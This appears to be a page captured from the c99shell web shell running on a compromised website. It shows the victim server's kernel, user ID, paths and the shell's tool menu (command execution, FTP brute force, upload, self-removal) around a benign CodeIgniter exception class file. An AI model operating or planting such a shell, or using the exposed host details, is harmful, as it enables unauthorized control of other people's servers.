smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/system/HTTP/Exceptions/   drwxr-xr-x
Free 3429.63 GB of 4265.01 GB (80.41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     HTTPException.php (4.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of CodeIgniter 4 framework.
 *
 * (c) CodeIgniter Foundation <admin@codeigniter.com>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

namespace CodeIgniter\HTTP\Exceptions;

use 
CodeIgniter\Exceptions\FrameworkException;

/**
 * Things that can go wrong with HTTP
 */
class HTTPException extends FrameworkException
{
    
/**
     * For CurlRequest
     *
     * @return HTTPException
     *
     * @codeCoverageIgnore
     */
    
public static function forMissingCurl()
    {
        return new static(
lang('HTTP.missingCurl'));
    }

    
/**
     * For CurlRequest
     *
     * @return HTTPException
     */
    
public static function forSSLCertNotFound(string $cert)
    {
        return new static(
lang('HTTP.sslCertNotFound', [$cert]));
    }

    
/**
     * For CurlRequest
     *
     * @return HTTPException
     */
    
public static function forInvalidSSLKey(string $key)
    {
        return new static(
lang('HTTP.invalidSSLKey', [$key]));
    }

    
/**
     * For CurlRequest
     *
     * @return HTTPException
     *
     * @codeCoverageIgnore
     */
    
public static function forCurlError(string $errorNumstring $error)
    {
        return new static(
lang('HTTP.curlError', [$errorNum$error]));
    }

    
/**
     * For IncomingRequest
     *
     * @return HTTPException
     */
    
public static function forInvalidNegotiationType(string $type)
    {
        return new static(
lang('HTTP.invalidNegotiationType', [$type]));
    }

    
/**
     * For Message
     *
     * @return HTTPException
     */
    
public static function forInvalidHTTPProtocol(string $protocols)
    {
        return new static(
lang('HTTP.invalidHTTPProtocol', [$protocols]));
    }

    
/**
     * For Negotiate
     *
     * @return HTTPException
     */
    
public static function forEmptySupportedNegotiations()
    {
        return new static(
lang('HTTP.emptySupportedNegotiations'));
    }

    
/**
     * For RedirectResponse
     *
     * @return HTTPException
     */
    
public static function forInvalidRedirectRoute(string $route)
    {
        return new static(
lang('HTTP.invalidRoute', [$route]));
    }

    
/**
     * For Response
     *
     * @return HTTPException
     */
    
public static function forMissingResponseStatus()
    {
        return new static(
lang('HTTP.missingResponseStatus'));
    }

    
/**
     * For Response
     *
     * @return HTTPException
     */
    
public static function forInvalidStatusCode(int $code)
    {
        return new static(
lang('HTTP.invalidStatusCode', [$code]));
    }

    
/**
     * For Response
     *
     * @return HTTPException
     */
    
public static function forUnkownStatusCode(int $code)
    {
        return new static(
lang('HTTP.unknownStatusCode', [$code]));
    }

    
/**
     * For URI
     *
     * @return HTTPException
     */
    
public static function forUnableToParseURI(string $uri)
    {
        return new static(
lang('HTTP.cannotParseURI', [$uri]));
    }

    
/**
     * For URI
     *
     * @return HTTPException
     */
    
public static function forURISegmentOutOfRange(int $segment)
    {
        return new static(
lang('HTTP.segmentOutOfRange', [$segment]));
    }

    
/**
     * For URI
     *
     * @return HTTPException
     */
    
public static function forInvalidPort(int $port)
    {
        return new static(
lang('HTTP.invalidPort', [$port]));
    }

    
/**
     * For URI
     *
     * @return HTTPException
     */
    
public static function forMalformedQueryString()
    {
        return new static(
lang('HTTP.malformedQueryString'));
    }

    
/**
     * For Uploaded file move
     *
     * @return HTTPException
     */
    
public static function forAlreadyMoved()
    {
        return new static(
lang('HTTP.alreadyMoved'));
    }

    
/**
     * For Uploaded file move
     *
     * @return HTTPException
     */
    
public static function forInvalidFile(?string $path null)
    {
        return new static(
lang('HTTP.invalidFile'));
    }

    
/**
     * For Uploaded file move
     *
     * @return HTTPException
     */
    
public static function forMoveFailed(string $sourcestring $targetstring $error)
    {
        return new static(
lang('HTTP.moveFailed', [$source$target$error]));
    }

    
/**
     * For Invalid SameSite attribute setting
     *
     * @return HTTPException
     *
     * @deprecated Use `CookieException::forInvalidSameSite()` instead.
     *
     * @codeCoverageIgnore
     */
    
public static function forInvalidSameSiteSetting(string $samesite)
    {
        return new static(
lang('Security.invalidSameSiteSetting', [$samesite]));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0078 ]--